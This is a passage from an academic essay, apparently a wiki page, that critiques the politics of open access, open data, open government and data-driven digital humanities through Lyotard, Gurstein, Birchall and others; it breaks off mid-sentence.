&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''From Open Science to Open Government ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such developments around open access and open data are themselves part of the larger trend or phenomenon that is coming to be known as ‘open science’. As Murray et al put it: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Open science is emerging as a collaborative and transparent approach to research. It is the idea that all data (both published and unpublished) should be freely available, and that private interests should not stymie its use by means of copyright, intellectual property rights and patents. It also embraces open access publishing and open source software… (Murray et al, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting and well known examples of how such open science may work is provided by the Open Notebook Science of the organic chemist Jean-Claude Bradley. ‘[I]in the interests of openness’, Bradley is making the [http://www.infotoday.com/IT/sep10/Poynder.shtml ‘details of every experiment done in his lab freely available on the web']. This ‘includes all the data generated from these experiments too, even the failed experiments’. What is more, he is doing so in ‘real time’, ‘within hours of production, not after the months or years involved in peer review’ (Poynder, 2010). Again, we can see how emphasis is being placed on the amount of research that can be shared, and the speed with which this can be achieved. This openness on Bradley’s part is also positioned as a means of achieving usefulness and impact, as is evident from the very title of one of his Open Notebook Science projects, [http://usefulchem.wikispaces.com/ UsefulChem]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; To be fair, however, such discourses around openness, transparency, efficiency and utility are not confined to the sciences – or even the university, for that matter. There are also wider political initiatives, dubbed ‘Open Government’, or ‘Government 2.0’, with both the Labour and the Conservative/Liberal Democrat coalition administrations in the UK making a great display of freeing government information. The Labour government implemented the Freedom of Information (FOI) Act in 2000, and then proceeded to launch a [http://www.data.gov.uk website] expressly dedicated to the release of governmental data sets in January 2010. It is a website that the current Conservative/Liberal Democrat coalition government continues to make extensive use of. In a similar vein, the [http://www.freeourdata.org.uk/ Guardian] newspaper has campaigned for the UK government to relinquish its copyright on all local, regional and national data collected with taxpayers’ money and to make such data freely and openly available to the public by publishing it online, where it can be collectively and collaboratively scrutinized, searched, mined, mapped, graphed, cross-tabulated, visualized, audited and interpreted using software tools. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Nor is this phenomenon confined to the UK. In the United States Barack Obama promised throughout his election campaign to make government more open. He followed this up by issuing a memorandum on transparency the very first day after he became President, vowing to make openness one of [http://www.nytimes.com/2009/01/22/us/politics/22obama.html ‘the touchstones of this presidency’”] (Obama, cited in Stolberg, 2009): ‘[http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ My Administration] is committed to creating an unprecedented level of openness in Government. We will work together to ensure the public trust and establish a system of transparency, public participation, and collaboration. Openness will strengthen our democracy and promote efficiency and effectiveness in Government’ (The White House, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''The Politics of Openness''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The connection I am making here between the movements for open access, open data, open science and open government is one that has to a certain extent already been pointed to by Michael Gurstein in his reflections on the experience of attending the 2011 conference of the [http://okfn.org/ Open Knowledge Foundation]. For Gurstein: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ the ‘open data/open government’ movement] begins from a profoundly political perspective that government is largely ineffective and inefficient (and possibly corrupt) and that it hides that ineffectiveness and inefficiency (and possible corruption) from public scrutiny through lack of transparency in its operations and particularly in denying to the public access to information (data) about its operations. And further that this access once available would give citizens the means to hold bureaucrats (and their political masters) accountable for their actions. In doing so it would give these self-same citizens a platform on which to undertake (or at least collaborate with) these bureaucrats in certain key and significant activities—planning, analyzing, budgeting that sort of thing. Moreover through the implementation of processes of crowdsourcing this would also provide the bureaucrats with the overwhelming benefits of having access to and input from the knowledge and wisdom of the broader interested public. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Put in somewhat different terms but with essentially the same meaning—it’s the taxpayer’s money and they have the right to participate in overseeing how it is spent. Having “open” access to government’s data/information gives citizens the tools to exercise that right. (Gurstein, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, for Gurstein, a much clearer understanding is needed than has been displayed by many open data/open government advocates to date of what exactly is meant by openness, and of where arguments in favour of open access, open information and open data are likely to lead us in the not too distant future. With this in mind, we could endeavour to put some flesh on the bones of Gurstein’s sketch of the politics of openness and suggest that, from a liberal perspective, freeing publicly funded and acquired information and data – whether it is gathered directly in the process of census collection, or indirectly as part of other activities (crime, healthcare, transport, schools and accident statistics) – is seen as helping society to perform more efficiently. For liberals, openness is said to play a key role in increasing citizen trust, participation and involvement in democracy, and indeed government, as access to information – such as that needed to intervene in public policy – is no longer restricted either to the state or to those corporations, institutions, organizations and individuals who have sufficient money and power to acquire it for themselves. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such liberal beliefs find support in the idea that making information and data freely and transparently available goes along with Article 19 of The Universal Declaration of Human Rights. The latter states that everyone has the right [http://www.un.org/en/documents/udhr/index.shtml ‘to seek, receive and impart information and ideas through any media and regardless of frontiers’]. Hillary Clinton, the United States Secretary of State, put forward a similar vision when, at the beginning of 2010, she said of her country that ‘[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full We stand for a single internet] where all of humanity has equal access to knowledge and ideas’, and against the authoritarian censorship and suppression of free speech and online search facilities like Google in countries such as China and Iran. Clinton declared: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full Even in authoritarian countries], information networks are helping people discover new facts and making governments more accountable. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; During his visit to China in November [2009], President Obama held a town hall meeting with an online component to highlight the importance of the internet. In response to a question that was sent in over the internet, he defended the right of people to freely access information, and said that the more freely information flows, the stronger societies become. He spoke about how access to information helps citizens to hold their governments accountable, generates new ideas, and encourages creativity. The United States' belief in that truth is what brings me here today. (Clinton, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This political sentiment was shared by Jeff Jarvis, author of ''What Would Google Do?'', when, in support of Google’s decision to stop self-filtering search results in China, he argued in March 2010 for a bill of rights for cyberspace: ‘[http://www.buzzmachine.com/2010/03/27/a-bill-of-rights-in-cyberspace/ to claim and secure our freedom] to connect, speak, assemble, and act online; to each control our identities and data; to speak our languages; to protect what is public and private; and to assure openness’ (Jarvis, 2010: 4). Yet are Clinton and Jarvis not both guilty here of overlooking (or should that be conveniently forgetting or even denying) the way liberal ideas of freedom and openness (and, indeed, of the human) have long been used in the service of colonialism and neoliberal globalisation? Does freedom for the latter not primarily mean economic freedom, i.e., freedom of the market, freedom of the consumer to choose what to consume – not only in terms of goods, but also lifestyles and ways of being? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Even if it was before the widespread use of networked computers, it is interesting that ‘fifteen years after the Freedom of Information Act law was passed’ in the US in 1966, ‘the General Accounting Office reported that 82 percent of requests [for information] came from business, nine percent from the press, and only 1 percent from individuals or public interest groups’ (Fung et al, 2007: 27-28). Certainly, in the UK today, the 'truth is that the [UK] FOI Act [2000] isn't used, for the most part, by “the people”’, as Tony Blair acknowledged in his recent memoir. ‘It's used by journalists’ (Blair, 2010) – and by businesses, one might add. In view of this, it is no surprise to find that neoliberals also support the making of government data freely and openly available to businesses and the public. They do so on the grounds that it provides a means of achieving the best possible ‘input/output ratio’ for society (Lyotard, 1986: 54). This way of thinking is of a piece with the emphasis placed by neoliberalism’s audit culture on accountability, transparency, evaluation, measurement and centralised data management: for example, in the context of UK higher education, it is evident in the emphasis placed on measuring the impact of research on society and the economy, teaching standards, contact hours, as well as student drop-out rates, future employment destinations and earning prospects. From this perspective, such openness and communicative transparency is perceived as ensuring greater value for (taxpayers’) money, supposedly helping to eliminate corruption, enabling costs to be distributed more effectively, and increasing choice, innovation, enterprise, creativity, competiveness and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meanwhile, some libertarians have gone so far as to argue that there is no need to make difficult policy decisions about what data and what information it is right to publish online and what to keep secret at all. Instead, we should work toward the kind of situation the science-fiction writer Bruce Sterling proposes. In ''Shaping Things'', his non-fiction book on the future of design, Sterling advocates retaining all data and information, ‘the known, the unknown known, and the unknown unknown’, in large archives and databases equipped with the necessary bandwidth, processing speed and storage capacity, and simply devising search tools and metadata that are accurate, fast and powerful enough to find and access it (Sterling, 2005: 47). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet to have participated in the shift away from questions of truth, justice and especially what, in ''The Inhuman'', Lyotard places under the headings of ‘heterogeneity, dissensus, event…the unharmonizable’ (1991: 4), and ''toward'' a concern with performativity, measurement and optimising the relation between input and output, one does not need to be a practicing [http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data data journalist], or to have actively contributed to the movements for open access, open data, open science or open government. If you are one of the 1.3 million plus people who have purchased a Kindle, and helped the sale of digital books outpace those of hardbacks on Amazon’s US website, then you have already signed a license agreement allowing the online book retailer - but not academic researchers or the public - to collect, store, mine, analyse and extract economic value from data concerning your personal reading habits for free. Similarly, if you are one of the over 687 million worldwide who use the Facebook social network, then you are already voluntarily giving your time and labour for free, not only to help its owners, their investors, and other companies make a reputed $1 billion a year from demographically targeted advertising, but to supply law enforcement agencies with profile data relating to yourself, your family, friends, colleagues and peers that they can [http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement use in investigations] (Hoffman, 2010). Even if you have done neither, you will in all probability have provided the Google technology company with a host of network data and digital traces it can both monetize and give to the police as a result of having mapped your home, digitized your book, or supplied you with free music videos to enjoy via Google Street View, Google Maps, Google Earth, Google Book Search and YouTube, which Google also owns. Lest this shift from open access to Google should seem somewhat farfetched, it is worth recalling that ‘[http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf Google has moved to establish, embellish, or replace many core university services] such as library databases, search interfaces, and e-mail servers’ (Vaidhyanathan, 2009: 65-66); and that academia in fact gave birth to Google, Google’s PageRank algorithm being little more [http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6 ‘than an expansion of what is known as citation analysis’] (Knouf, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;R7yfV6RzE30&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Obviously, no matter how exciting and enjoyable such activities may be, you don't ''have'' to buy that e-book reader, join that social network or display your personal metrics online, from sexual activity to food consumption, in an attempt to identify patterns in your life – what is called life-tracking or self-tracking. (Although, actually, a lot of people are quite happy to keep contributing to the networked communities reached by Facebook and YouTube, even though they realise they are being used as free labour and that, in the case of the former, much of what they do cannot be accessed by search engines and web browsers. They just see this as being part of the deal and a reasonable trade-off for the services and experiences that are provided by these companies.) Nevertheless, refusing to take part in this transformation of knowledge and learning into quantities of data, and shift ''away'' from critical questions of what is just and right ''toward'' a concern with optimizing the system’s performance is not an option for most of us. It is not something that can be opted out of by simply declining to take out a Tesco Club Card or use cash-points, refusing to look for research using Google Scholar, or committing social networking [http://www.suicidemachine.org/ ‘suicide’] and reading print-on-paper books instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For one thing, the process of capturing data by means not just of the internet, but a myriad of cameras, sensors and robotic devices, is now so ubiquitous and all pervasive it is impossible to avoid being caught up in it, no matter how rich, knowledgeable and technologically proficient you are. The latest research indicates there are approximately 1.85 million CCTV cameras in the UK – one for every 32 people. Yet no one really knows how many CCTV cameras are actually in operation in Britain today - and that’s without even mentioning other means of gathering data that are reputed to be more intrusive still, such as mobile phone GPS location and automatic vehicle number plate recognition (ANPR). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For another, and as the example of CCTV illustrates, it’s not necessarily a question of actively doing something in this respect: of positively contributing free labour to the likes of Flickr and YouTube, for instance, or of refusing to do so. Nor is it merely a case of the separation between work and non-work being harder to maintain nowadays. (Is it work, leisure or play when you are writing a status update on Facebook, posting a photograph, ‘friending’ someone, interacting, detailing your ‘likes’ and ‘dislikes’ regarding the places you eat, the films you watch, the books you read?) As Gilles Deleuze and Felix Guattari pointed out some time ago, ‘surplus labor no longer requires labor... one may furnish surplus-value without doing any work’, or anything that even remotely resembles work for that matter, at least as it is most commonly understood: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;In these new conditions, it remains true that all labour involves surplus labor; but surplus labor no longer requires labor. Surplus labor, capitalist organization in its entirety, operates less and less by the striation of space-time corresponding to the physicosocial concept of work. Rather, it is as though human alienation through surplus labor were replaced by a generalized ‘machinic enslavement’, such that one may furnish surplus-value without doing any work (children, the retired, the unemployed, television viewers, etc.). Not only does the user as such tend to become an employee, but capitalism operates less on a quantity of labor than by a complex qualitative process bringing into play modes of transportation, urban models, the media, the entertainment industries, ways of perceiving and feeling – every semiotic system. It is as though, at the outcome of the striation that capitalism was able to carry to an unequalled point of perfection, circulating capital necessarily recreated, reconstituted, a sort of smooth space in which the destiny of human beings is recast. ((Deleuze and Guattari, 1988: 492)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Transparency?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Before going any further, I should perhaps confess that I am a staunch advocate of open access in the humanities. Nevertheless, there are a number of issues that need to be raised with regard to making research and data openly available online for free. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The first point to make in this respect is that, far from revealing any hitherto unknown, hidden or secret knowledge, such discourses of openness and transparency are themselves often not very open or transparent. Staying with the relationship between politics and science, let us take as an example the response of Ed Miliband, leader of the UK’s Labour Party, to the [http://en.wikipedia.org/wiki/Climatic_Research_Unit_email_controversy 'Climategate']controversy, in which climate skeptics alleged that emails hacked from the University of East Anglia’s Climatic Research Unit revealed that scientists have tampered with the data in order to support the theory that global warming is man-made. Miliband’s answer was to advocate ‘[http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame maximum transparency]– let’s get the data out there’, he urged. ‘The people who believe that climate change is happening and is man-made have nothing to fear from transparency’ (Miliband, quoted in Westcott, 2009: 7; cited by Birchall,&amp;amp;nbsp;2011b). Yet, actually, complete transparency is impossible. This is because, as Clare Birchall has shown, there is an aporia at the heart of any claim to transparency. ‘For transparency to be known as transparency, there must be some agency (such as the media [or politicians, or government]) that legitimizes it as transparent, and because there is a legitimizing agent which does not itself have to be transparent, there is a limit to transparency’ (Birchall,&amp;amp;nbsp;2011a: 142). In fact, the more transparency is claimed, the more the violence of the mediating agency of this transparency is concealed, forgotten or obscured. Birchall offers the example of ‘The Daily Telegraph and its exposure of MPs’ expenses during the summer of 2009. While appearing to act on the side of transparency, as a commercial enterprise the paper itself has in the past been subject to secret takeover bids and its former owner, Lord Conrad Black, convicted of fraud and obstructing justice’ (Birchall,&amp;amp;nbsp;2011a: 142). To paraphrase a question from Lyotard I am going to return to at more length: Who decides what transparency is, and who knows what needs to be transparent (1986: 9)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Furthermore, merely making such information and data available to the public online will not in itself necessarily change anything. In fact, such processes have often been adopted precisely as a means of avoiding change. Aaron Swartz provides the example of Watergate: ‘[http://www.aaronsw.com/weblog/usefultransparency after Watergate], people were upset about politicians receiving millions of dollars from large corporations. But, on the other hand, corporations seem to like paying off politicians. So instead of banning the practice, Congress simply required that politicians keep track of everyone who gives them money and file a report on it for public inspection’ (Swartz, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Openness?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Much the same can be said for the idea that making research and data accessible to the public supposedly helps to make society more open and free. Take the belief we saw expressed above by Hilary Clinton: that people in the United States have free access to the internet while those in China and Iran do not. Those of us who live and work in the West do indeed have a certain freedom to publish and search online. Yet none of this rhetoric about freedom and transparency prevented the Obama government from condemning Wikileaks in November 2010 as [http://www.msnbc.msn.com/id/40405589/ns/us_news-security ‘reckless and dangerous’], after it opened up access to hundreds of thousands of classified State Department documents (Gibbs, 2010); nor from putting pressure on Amazon and other companies to stop hosting the whistle-blowing website, an action which had echoes of the dispute over censorship between Google and the Chinese government earlier in 2010. (Significantly, the Obama administration has also recently withdrawn the bulk of funding from the United States open government website www.data.gov, which served as an influential precursor to the previously mentioned [http://www.data.gov.uk www.data.gov.uk] website in the UK.) Furthermore, unless you are a large political or economic actor, or one of the lucky few, the statistics show that what you publish online is unlikely to receive much attention. Just ‘three companies – Google, Yahoo! and Microsoft – handle 95 percent of all search queries’; while ‘for searches containing the name of a specific political organisation, Yahoo! and Google agree on the top result 90 percent of the time’ (Hindman, 2009: 59, 79). Meanwhile, one company, Google, reportedly has 65&amp;amp;nbsp;% of the world’s search market, ‘72 per cent share of the US search market, and almost 90 per cent in the UK’ – a degree of domination that has led the European Union to investigate Google for abusing its power to favour its own products while suppressing those of rivals (Arthur, 2010: 3). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; But it is not just that Google’s algorithms are ranking some websites on the first page of its results and others on page 42 (which means, in effect, that the latter are rarely going to be accessed, since very few people read beyond the first page of Google’s results). It is that conventional search engines are reaching only an extremely small percentage of the total number of available web pages. Ten years ago Michael K. Bergman was already placing the figure at 0.03%, or [http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 ‘one in 3,000’], with ‘public information on the deep Web’ even then being ‘400 to 550 times larger than the commonly defined World Wide Web’. Consequently, while according to Bergman as much as ‘ninety-five per cent of the deep Web’ may be ‘publicly accessible information – not subject to fees or subscriptions’ – by far the vast majority of it is left untouched (Bergman, 2001). And that is before we even begin to address the issue of how the recent rise of the app, and use of the password protected Facebook for search purposes, may today be [http://www.wired.com/magazine/2010/08/ff_webrip/ annihilating the very idea of the openly searchable Web]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We can therefore see that it is not enough simply to [http://www.freeourdata.org.uk/ ‘Free Our Data’], as the Guardian has it; or to operate on the basis that ‘information wants to be free’ (Wark, 2004) (although doing so of course may be a start, especially in an era when notions of the open web and net neutrality are under severe threat). We can put ever more research and data online; we can make it freely available to both other researchers and the public under open access, open data, open science and open government conditions; we can even integrate, index and link it using the appropriate metadata to enable it to be searched and harvested with relative ease. But none of this means this research and data is going to be found. Ideas of this kind ignore the fact that all information and data is ordered, structured, selected and framed in a particular way. This is what metadata is for, after all. Metadata is information or data that describes, links to, or is otherwise used to control, find, select, filter, classify and present other data. One example would be the information provided at the front of a book detailing its publisher, date and place of publication, ISBN number, and so on. However, the term ‘metadata’ is most commonly associated with the language of computing. There, metadata is what enables computers to access files and documents, not just in their own hard drives, but potentially across a range of different platforms, servers, websites and databases. Yet for all its associations with computer science, metadata is never neutral or objective. Although the term ‘data’ comes from the Latin word datum, meaning [http://www.collinslanguage.com/results.aspx?context=3&amp;amp;reversed=False&amp;amp;action=define&amp;amp;homonym=-1&amp;amp;text=datum ‘something given’], data is not simply objectively out there in the world already provided for us. The specific ways in which metadata is created, organized and presented helps to produce (rather than merely passively reflect) what is classified as data and information – and what is not. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clearly, then, it is not just a question of free and open access to the research and data; nor of providing support, education and training on how to understand, interpret, use and apply it effectively, as [http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/ Gurstein] has argued (2010). It is also a question of who (and what) makes decisions regarding the data and metadata, and thus gets to exercise control over it, and on what basis such decisions are made. To paraphrase Lyotard once more: who decides what data and metadata is, and who knows what needs to be decided?’ (1986: 9). Who gets to legislate? And who legitimates the legislators (1986: 8)? Will the ‘ruling class’ – top civil servants and consulting firms full of people with MBAs, ‘corporate leaders, high-level administrators, and the heads of the major professional, labor, political, and religious organizations’, including those behind Google, Apple, Facebook, Amazon, JISC, AHRC, OAI, SPARC, COASP – continue to operate as the class of interpreters, gatekeepers and ‘decision makers,’ not just with regard to having ‘access to the information these machines must have in storage to guarantee that the right decisions are made’, but with regard to creating and controlling the data and metadata, too (1986: 14)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''On Data-Intensive Scholarship''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; If, as demonstrated above, discourses of openness and transparency are themselves not very open or transparent at all, much of the current emphasis on making the research and data open and free is also lacking in self-reflectivity and meaningful critique. We can see this not just in those discourses associated with open access, open data, open science and open government that are explicitly emphasizing the importance of transparency, performativity and efficiency. This lack of criticality is apparent in much of what goes under the name of ‘digital humanities’, too, especially those elements associated with the ‘computational turn’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We tend to think of the humanities as being self-reflexive per se, and as frequently asking questions capable of troubling culture and society. Yet after decades when humanities scholarship made active use of a variety of critical theories – Marxist, psychoanalytic, post-colonialist, post-Marxist – it seems somewhat surprising that many advocates of this current turn to data-intensive scholarship in the humanities find it difficult to understand computing and the digital as much more than tools, techniques and resources. As a result, much of the scholarship that is currently occurring under the ‘digital humanities’ agenda is uncritical, naive and at times even banal ([http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities Liu], 2011; [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ Higgen], 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Witness the current emphasis on making the data not only visible but also visual. Stefanie Posavec’s frequently referred to [http://www.itsbeenreal.co.uk/index.php?/wwwords/literary-organism/ Literary Organism], which visualises the structure of Part One of Kerouac’s ''On the Road'' as a tree, provides one example; those cited earlier courtesy of Lev Manovich and the Software Studies Initiative offer another. Now, there is a long history of critical engagement within the humanities with ideas of the visual, the image, the spectacle, the spectator and so on: not just in critical theory, but also in cultural studies, women’s studies, media studies, film and television studies. Such a history of critical engagement stretches back to Guy Debord’s influential 1967 work, ''The Society of the Spectacle'', and beyond. For example, in his introduction to a 1995 book edited with Lynn Cooke, ''Visual Display: Culture Beyond Appearances'', Peter Wollen writes that an excess of visual display within culture has 'the effect of concealing the truth of the society that produces it, providing the viewer with an unending stream of images that might best be understood, not simply detached from a real world of things, as Debord implied, but as effacing any trace of the symbolic, condemning the viewer to a world in which we can see everything but understand nothing—allowing us viewer-victims, in Debord’s phrase, only &amp;quot;a random choice of ephemera&amp;quot;’ (1995: 9). It can come as something of a surprise, then, to discover that this humanities tradition in which ideas of the visual are engaged critically appears to have had comparatively little impact on the current enthusiasm for data visualisation that is so prominent an aspect of the turn toward data-intensive scholarship. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Of course, this (at times explicit) repudiation of criticality could be precisely what makes certain aspects of the digital humanities so seductive for many at the moment. Exponents of the computational turn can be said to be endeavouring to avoid conforming to accepted (and often moralistic) conceptions of politics that have been decided in advance, including those that see it only in terms of power, ideology, race, gender, class, sexuality, ecology, affect etc. Refusing to [http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html ‘go through the motions of a critical avant-garde’], to borrow the words of Bruno Latour (2004), they often position themselves as responding to what is perceived as a fundamentally new cultural situation, and to the challenge it represents to our traditional methods of studying culture, by avoiding conventional theoretical manoeuvres and by experimenting with the development of fresh methods and approaches for the humanities instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, for instance, sees the sheer scale and dynamics of the contemporary new media landscape as presenting the usually accepted means of studying culture that were dominant for so much of the 20th century – the kinds of theories, concepts and methods appropriate to producing close readings of a relatively small number of texts – with a significant practical and conceptual challenge. In the past, ‘[http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html cultural theorists and historians could generate theories and histories] based on small data sets (for instance, “classical Hollywood cinema”, “Italian Renaissance”, etc.) But how can we track “global digital cultures”, with their billions of cultural objects, and hundreds of millions of contributors’, he asks (Manovich, 2010)? Three years ago Manovich was already describing the ‘numbers of people participating in social networks, sharing media, and creating user-generated content’ as simply ‘astonishing’: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html MySpace, for example,] claims 300 million users. Cyworld, a Korean site similar to MySpace, claims 90 percent of South Koreans in their 20s and 25 percent of that country's total population (as of 2006) use it. Hi5, a leading social media site in Central America has 100 million users and Facebook, 14 million photo uploads daily. The number of new videos uploaded to YouTube every twenty-four hours (as of July 2006): 65,000. (Manovich in Franklin &amp;amp;amp; Rodriguez’G, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The solution Manovich proposes to this ‘data deluge’ is to turn to the very computers, databases, software and vast amounts of born-digital networked cultural content that are causing the problem in the first place, and to use them to help develop new methods and approaches adequate to the task at hand. This is where what he calls Cultural Analytics comes in. [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘The key idea of Cultural Analytics] is the use of computers to automatically analyze cultural artefacts in visual media, extracting large numbers of features that characterize their structure and content’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009); and what is more, to do so not just with regard to the culture of the past, but also with that of the present. To this end, Manovich (not unlike the Google technology company) calls for as much of culture as possible to be made available in external, digital form: [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘not only the exceptional but also the typical]; not only the few cultural sentences spoken by a few &amp;quot;great man&amp;quot; [sic] but the patterns in all cultural sentences spoken by everybody else’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a series of posts on his Found History blog, Tom Scheinfeldt, managing director at the Center for History and New Media at George Mason University, positions such developments in terms of a shift from a concern with theory and ideology to a [http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ concern with methodology] (2008). In this respect there may well be a degree of [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ ‘relief in having escaped the culture wars of the 1980s’] – for those in the US especially – as a result of this move ‘into the space of methodological work’ (Croxall, 2010) and what Scheinfeldt reportedly dubs [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘the post-theoretical age’] (cited in P. Cohen, 2010). The problem, though, is that without such reflexive critical thinking and theories many of those whose work forms part of this computational turn find it difficult to articulate exactly what the point of what they are doing is, as Scheinfeldt readily acknowledges (2010a). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Take one of the projects mentioned earlier: the attempt by [http://victorianbooks.org Dan Cohen and Fred Gibbs] to text-mine all the books published in English in the Victorian age (or at least those digitized by Google). Among other things, this allows Cohen and Gibbs to show that use of the word ‘revolution’ in book titles of the period spiked around [http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader ‘the French Revolution and the revolutions of 1848’] (D. Cohen, 2010). But what argument are they trying to make with this calculation? What is it we are able to learn as a result of this use of computational power on their part that we did not know already and could not have discovered without it ([http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/ Scheinfeldt], 2008)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In an explicit response to Cohen and Gibbs’s project, Scheinfeldt suggests that the problem of theory, or the lack of it, may actually be a question of scale: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader It expects something of the scale of humanities scholarship] which I’m not sure is true anymore: that a single scholar—nay, every scholar—working alone will, over the course of his or her lifetime ... make a fundamental theoretical advance to the field. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Increasingly, this expectation is something peculiar to the humanities. ...it required the work of a generation of mathematicians and observational astronomers, gainfully employed, to enable the eventual “discovery” of Neptune... Since the scientific revolution, most theoretical advances play out over generations, not single careers. (Scheinfeldt, 2010b)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Now, it is absolutely important that we as scholars experiment with the new tools, methods and materials that digital media technologies create and make possible, in order to bring into play new forms of Foucauldian ''dispositifs'', or what Bernard Stiegler calls ''hypomnemata'', or what I am trying to think in terms of [http://garyhall.info media gifts]. I would include in this 'experimentation imperative’ techniques and methodologies drawn from computer science and other related fields, such as information visualisation, data mining and so forth. Nevertheless, there is something troubling about this kind of deferral of critical and self-reflexive theoretical questions to an unknown point in time, still possibly a generation away. After all, the frequent suggestion is that now is not the right time to be making any such decision or judgement, since we cannot yet know how humanists will eventually come to use these tools and data, and thus what data-driven scholarship may or may not turn out to be capable of, critically, politically, theoretically. One of the consequences of this deferral, however, is that it makes it extremely difficult to judge whether this postponement is indeed acting as a responsible, political and ethical opening to the (heterogeneity and incalculability of the) future, including the future of the humanities; or whether it is serving as an alibi for a naive and rather superficial form of scholarship instead ([https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/ Meeks], 2010). A form of scholarship moreover that, in uncritically and un-self-reflexively adopting techniques and methodologies drawn from computer science, can be 